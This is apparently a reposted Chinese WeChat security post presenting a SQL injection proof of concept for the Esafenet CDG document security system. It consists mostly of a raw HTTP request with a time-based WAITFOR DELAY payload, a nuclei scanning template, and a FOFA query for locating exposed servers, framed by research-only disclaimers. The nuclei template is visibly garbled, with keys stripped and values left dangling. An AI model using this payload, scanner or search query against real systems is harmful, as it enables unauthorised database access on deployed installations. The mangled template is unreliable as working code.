免责声明
该公众号主要是分享互联网上公开的一些漏洞poc和工具,利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如果本公众号分享导致的侵权行为请告知,我们会立即删除并道歉。
漏洞影响范围
漏洞复现
poc
延时注入4秒
POST /CDGServer3/dwr/call/plaincall/JLockSeniorDao.findByLockName.dwr HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: text/plain
Content-Length: 208
callCount=1
page=/CDGServer3/dwr/test/JLockDao
httpSessionId=
scriptSessionId=
c0-scriptName=JLockSeniorDao
c0-methodName=findByLockName
c0-id=0
c0-param0=string:defaultKey1';WAITFOR DELAY '0:0:4'--
batchId=0
出现如下数据表示漏洞存在
nuclei脚本
id: Yisaitong-jlockseniordao-findbylockname-SQL
info:
name: 亿赛通电子文档安全管理系统 jlockseniordao-findbylockname sql注入
author: 小白菜
severity: high
description: |
metadata:
:
reference:
https://
tags: auto
http:
raw:
|
POST /CDGServer3/dwr/call/plaincall/JLockSeniorDao.findByLockName.dwr HTTP/1.1
Host: {{Hostname}}
text/plain :
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 :
callCount=1
page=/CDGServer3/dwr/test/JLockDao
httpSessionId=
scriptSessionId=
JLockSeniorDao =
findByLockName =
0 =
string:defaultKey1';WAITFOR DELAY '0:0:4'-- =
batchId=0
true :
2 :
and :
matchers:
type: word
part: body
words:
'throw'
'allowScriptTagRemoting'
condition: or
搜索语法
fofa:app="亿赛通-电子文档安全管理系统"
原文始发于微信公众号(小白菜安全):亿赛通电子文档安全管理系统 jlockseniordao-findbylockname sql注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论